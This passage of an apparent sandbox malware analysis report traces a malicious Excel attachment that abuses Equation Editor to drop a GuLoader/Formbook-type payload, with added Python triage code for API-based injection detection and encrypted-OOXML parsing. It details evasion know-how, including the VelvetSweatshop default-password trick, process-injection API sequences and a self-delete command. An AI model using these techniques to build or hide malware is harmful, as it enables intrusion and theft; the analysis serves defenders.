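    ("remote write + thread resume", frozenset({"NtWriteVirtualMemory", "NtResumeThread"})),
]

# A subset of lines copied from this report (constructed input for the example).
SAMPLE_LINES = r"""
Source: C:\Users\Public\vbc.exe Code function: 4_2_00310516 NtSetInformationThread, 4_2_00310516
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031260D NtWriteVirtualMemory, 4_2_0031260D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00316106 NtResumeThread, 4_2_00316106
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_1E98FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FE24 NtWriteVirtualMemory, 5_2_1E98FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E991930 NtSetContextThread, 5_2_1E991930
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E990078 NtResumeThread,LdrInitializeThunk, 5_2_1E990078
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E98FF34 NtQueueApcThread, 5_2_1E98FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFE24 NtWriteVirtualMemory, 9_2_020AFE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020AFF34 NtQueueApcThread, 9_2_020AFF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020B1930 NtSetContextThread, 9_2_020B1930
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403858 4_2_00403858
"""


def parse_code_function(line):
    """Return (image, proc_id, address, [apis]) for one report line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    apis = [a for a in m.group("apis").split(",") if a]
    return m.group("image"), m.group("proc"), int(m.group("addr"), 16), apis


def classify(apis):
    """Names of techniques whose complete API set is present in `apis`."""
    present = set(apis)
    return [name for name, needed in TECHNIQUES if needed <= present]


def summarize_report(lines):
    """Aggregate call sites per sandbox process id and attach technique labels."""
    procs = defaultdict(lambda: {"image": None, "functions": 0, "apis": set()})
    for line in lines:
        parsed = parse_code_function(line)
        if parsed is None:
            continue
        image, proc, _addr, apis = parsed
        entry = procs[proc]
        entry["image"] = image
        entry["functions"] += 1
        # Keep only native (Nt*) calls; LdrInitializeThunk etc. are just call-site neighbours.
        entry["apis"].update(a for a in apis if a.startswith("Nt"))
    for entry in procs.values():
        entry["techniques"] = classify(entry["apis"])
    return dict(procs)


if __name__ == "__main__":
    for proc, info in sorted(summarize_report(SAMPLE_LINES.strip().splitlines()).items()):
        print(proc, info["image"], sorted(info["apis"]), info["techniques"])
```

Run against the full report the same way (`summarize_report(open("report.txt").read().splitlines())`); the address column is kept so a hit can be mapped back to a call site in the disassembly.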
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403858 4_2_00403858
Source: C:\Users\Public\vbc.exe Code function: 4_2_00401218 4_2_00401218
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403C2E 4_2_00403C2E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403A59 4_2_00403A59
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403AEE 4_2_00403AEE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403A87 4_2_00403A87
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403B49 4_2_00403B49
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403B13 4_2_00403B13
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9BEE4C 5_2_1E9BEE4C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9B0F3F 5_2_1E9B0F3F
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA3FDDD 5_2_1EA3FDDD
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9D0D3B 5_2_1E9D0D3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9ACD5B 5_2_1E9ACD5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA53A83 5_2_1EA53A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA4CBA4 5_2_1EA4CBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99FBD7 5_2_1E99FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA2DBDA 5_2_1EA2DBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9C7B00 5_2_1E9C7B00
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA3F8EE 5_2_1EA3F8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9AC85C 5_2_1E9AC85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9C286D 5_2_1E9C286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A29B2 5_2_1E9A29B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA4098E 5_2_1EA4098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9B69FE 5_2_1E9B69FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA25955 5_2_1EA25955
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A4680 5_2_1E9A4680
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9AE6C1 5_2_1E9AE6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA42622 5_2_1EA42622
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9AC7BC 5_2_1E9AC7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA2579A 5_2_1EA2579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9B1489 5_2_1E9B1489
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9D5485 5_2_1E9D5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9BC5F0 5_2_1E9BC5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A351F 5_2_1E9A351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99E2E9 5_2_1E99E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_1EA41238 5_2_1EA41238
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9C63DB 5_2_1E9C63DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99F3CF 5_2_1E99F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A2305 5_2_1E9A2305
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A7353 5_2_1E9A7353
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9EA37B 5_2_1E9EA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99E0C6 5_2_1E99E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9B905A 5_2_1E9B905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E9A3040 5_2_1E9A3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02161238 9_2_02161238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BE2E9 9_2_020BE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C2305 9_2_020C2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C7353 9_2_020C7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0210A37B 9_2_0210A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_021663BF 9_2_021663BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BF3CF 9_2_020BF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020E63DB 9_2_020E63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020ED005 9_2_020ED005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C3040 9_2_020C3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020D905A 9_2_020D905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BE0C6 9_2_020BE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0210A634 9_2_0210A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02162622 9_2_02162622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C4680 9_2_020C4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020CE6C1 9_2_020CE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0214579A 9_2_0214579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020CC7BC 9_2_020CC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020F57C3 9_2_020F57C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0214443E 9_2_0214443E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020FD47D 9_2_020FD47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020D1489 9_2_020D1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020F5485 9_2_020F5485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C351F 9_2_020C351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02106540 9_2_02106540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020DC5F0 9_2_020DC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02173A83 9_2_02173A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020E7B00 9_2_020E7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0216CBA4 9_2_0216CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0214DBDA 9_2_0214DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BFBD7 9_2_020BFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020CC85C 9_2_020CC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020E286D 9_2_020E286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0215F8EE 9_2_0215F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02145955 9_2_02145955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0214394B 9_2_0214394B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0216098E 9_2_0216098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020C29B2 9_2_020C29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020D69FE 9_2_020D69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020F2E2F 9_2_020F2E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020DEE4C 9_2_020DEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020D0F3F 9_2_020D0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020EDF7C 9_2_020EDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0215CFB1 9_2_0215CFB1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_02132FDC 9_2_02132FDC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020F0D3B 9_2_020F0D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020CCD5B 9_2_020CCD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0215FDDD 9_2_0215FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009E5ED 9_2_0009E5ED
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009D781 9_2_0009D781
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00089E2C 9_2_00089E2C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00089E30 9_2_00089E30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009DE55 9_2_0009DE55
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009DF6E 9_2_0009DF6E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CF93 9_2_0009CF93
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00082FB0 9_2_00082FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Unique food order.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
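An .xlsx that is an OLE compound file yet has none of the Word, Excel, PowerPoint or Visio streams is the signature of an OOXML package wrapped in the Office encryption container (MS-OFFCRYPTO): the compound file carries EncryptionInfo and EncryptedPackage streams and a DataSpaces storage instead of a Workbook stream. Attackers encrypt with Excel's built-in default password VelvetSweatshop, which Excel tries silently, so the victim sees no prompt while static scanners that expect either a ZIP or a Workbook stream see nothing. The following is an added example, not from the report: a minimal MS-CFB directory walker that lists the streams and reproduces the "indicators all false" check, next to the ZIP branch that lists embedded OLE objects (an Equation Editor object in a plain workbook sits under xl/embeddings/). Both sample files are constructed inside the code; the walker reads only the header DIFAT and ignores the sibling tree, which is enough for triage but is not a full parser.

```python
import io
import struct
import zipfile

# MS-CFB magic and special sector ids.
CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
ZIP_MAGIC = b"PK\x03\x04"
ENDOFCHAIN, FREESECT, FATSECT = 0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFD

# Stream whose presence marks a plain (unencrypted) legacy document of each application.
OFFICE_STREAMS = {"Workbook": "Excel", "Book": "Excel", "WordDocument": "Word",
                  "PowerPoint Document": "PowerPoint", "VisioDocument": "Visio"}


def cfb_stream_names(data):
    """List the names of all allocated directory entries in a compound file.
    Triage-grade on purpose: only the 109 DIFAT slots in the header are read
    (files below ~6.8 MB) and entries are enumerated linearly, not via the tree."""
    if data[:8] != CFB_MAGIC:
        raise ValueError("not an OLE compound file")
    sector_size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    num_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)

    def sector(n):                      # sector 0 starts right after the 512-byte header
        return data[(n + 1) * sector_size:(n + 2) * sector_size]

    fat = []
    for s in difat[:num_fat]:
        if s >= 0xFFFFFFFA:             # special marker, not a real FAT sector
            break
        chunk = sector(s)
        if len(chunk) != sector_size:
            raise ValueError("truncated FAT sector")
        fat.extend(struct.unpack("<%dI" % (sector_size // 4), chunk))

    names, sect, seen = [], first_dir, set()
    while sect < len(fat) and sect not in seen:   # ENDOFCHAIN/FREESECT fall out of range
        seen.add(sect)
        chunk = sector(sect)
        for off in range(0, len(chunk) - 127, 128):
            entry = chunk[off:off + 128]
            name_len = struct.unpack_from("<H", entry, 64)[0]   # bytes incl. UTF-16 NUL
            obj_type = entry[66]                                # 0 unused, 1 storage, 2 stream, 5 root
            if obj_type and 2 <= name_len <= 64:
                names.append(entry[:name_len - 2].decode("utf-16-le"))
        sect = fat[sect]
    return names


def triage_office_file(data):
    """Classify the container and extract the indicators a static scanner keys on."""
    if data[:4] == ZIP_MAGIC:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            entries = zf.namelist()
        return {"container": "ooxml-zip", "streams": entries, "office_streams": {},
                "embedded_ole": [e for e in entries if "/embeddings/" in e],
                "encrypted_ooxml": False}
    names = cfb_stream_names(data)
    indicators = {app: False for app in OFFICE_STREAMS.values()}
    for stream, app in OFFICE_STREAMS.items():
        if stream in names:
            indicators[app] = True
    return {"container": "ole-cfb", "streams": names, "office_streams": indicators,
            "embedded_ole": [],
            "encrypted_ooxml": "EncryptionInfo" in names and "EncryptedPackage" in names}


def build_cfb(entries):
    """Construct a minimal v3 compound file (one FAT sector, one directory sector)
    for the example; `entries` are (name, object_type) pairs, root first, all empty."""
    header = bytearray(512)
    header[:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", header, 0x18, 0x3E, 3, 0xFFFE, 9, 6)      # v3, 512-byte sectors
    struct.pack_into("<9I", header, 0x28, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", header, 0x4C, 0, *([FREESECT] * 108))      # DIFAT[0] -> FAT sector 0
    fat_sector = struct.pack("<128I", FATSECT, ENDOFCHAIN, *([FREESECT] * 126))
    dir_sector = bytearray(512)
    for i, (name, obj_type) in enumerate(entries[:4]):
        raw = name.encode("utf-16-le") + b"\x00\x00"
        entry = bytearray(128)
        entry[:len(raw)] = raw
        struct.pack_into("<HBB", entry, 64, len(raw), obj_type, 1)
        struct.pack_into("<III", entry, 68, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF)  # no siblings/child
        struct.pack_into("<IQ", entry, 116, ENDOFCHAIN, 0)                       # start sector, size
        dir_sector[i * 128:(i + 1) * 128] = entry
    return bytes(header) + fat_sector + bytes(dir_sector)


def build_plain_xlsx():
    """Constructed stand-in for an unencrypted workbook with one embedded OLE object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/embeddings/oleObject1.bin", b"\x00" * 16)
    return buf.getvalue()


# Constructed samples: the encrypted shape described above, and a plain workbook.
SAMPLE_ENCRYPTED_XLSX = build_cfb([("Root Entry", 5), ("EncryptionInfo", 2),
                                   ("EncryptedPackage", 2), ("\x06DataSpaces", 1)])
SAMPLE_PLAIN_XLSX = build_plain_xlsx()
```

When the triage returns `encrypted_ooxml`, decrypt before any further static work (for example with msoffcrypto-tool: `msoffcrypto-tool "Unique food order.xlsx" decrypted.xlsx -p VelvetSweatshop`) and then run the ZIP branch on the result; the default password only applies to Excel, so a Word document in the same container needs the real password.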
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 1E99E2A8 appears 34 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1EA0F970 appears 77 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E9E373B appears 237 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E9E3F92 appears 99 times
Source: C:\Users\Public\vbc.exe Code function: String function: 1E99DF5C appears 100 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020BE2A8 appears 38 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0212F970 appears 84 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 02103F92 appears 132 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 0210373B appears 245 times
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: String function: 020BDF5C appears 119 times
PE file contains strange resources
Source: svchost[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Unique food order.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR80B.tmp
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e................... .......................2.........*.......*.....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ......................*.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$Ys..............*.............................&.................*.....
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Unique food order.xlsx Virustotal: Detection: 24%
Source: Unique food order.xlsx ReversingLabs: Detection: 22%
Source: Unique food order.xlsx Virustotal: Detection: 24%
Source: Unique food order.xlsx ReversingLabs: Detection: 22%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: unknown Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Unique food order.xlsx Static file information: File size 2303488 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
Source: Unique food order.xlsx Initial sample: OLE indicators vbamacros = False
Source: Unique food order.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040984F push ecx; retf 4_2_004098B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409D50 push edi; ret 4_2_00409D5D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409D55 push edi; ret 4_2_00409D5D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406910 pushad ; iretd 4_2_00406914
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069F5 push EF15CAC2h; ret 4_2_00406A05
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040759B push FFFFFFC6h; ret 4_2_004075A2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406653 pushad ; iretd 4_2_00406654
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406A98 pushfd ; ret 4_2_00406A9A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004082AF push FFFFFFDAh; ret 4_2_004082B2
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040A3DA push ecx; retf 4_2_0040A3DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00407FAA push esp; ret 4_2_00407FB1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00407FB3 push ecx; retf 4_2_00407FBC
Source: C:\Users\Public\vbc.exe Code function: 5_2_1E99DFA1 push ecx; ret 5_2_1E99DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020BDFA1 push ecx; ret 9_2_020BDFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_000969BB push esi; ret 9_2_000969BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0008AB07 push ds; retf 9_2_0008AB09
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00094E05 push ss; retf 9_2_00094E06
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CEA5 push eax; ret 9_2_0009CEF8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CEFB push eax; ret 9_2_0009CF62
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CEF2 push eax; ret 9_2_0009CEF8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009CF5C push eax; ret 9_2_0009CF62

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
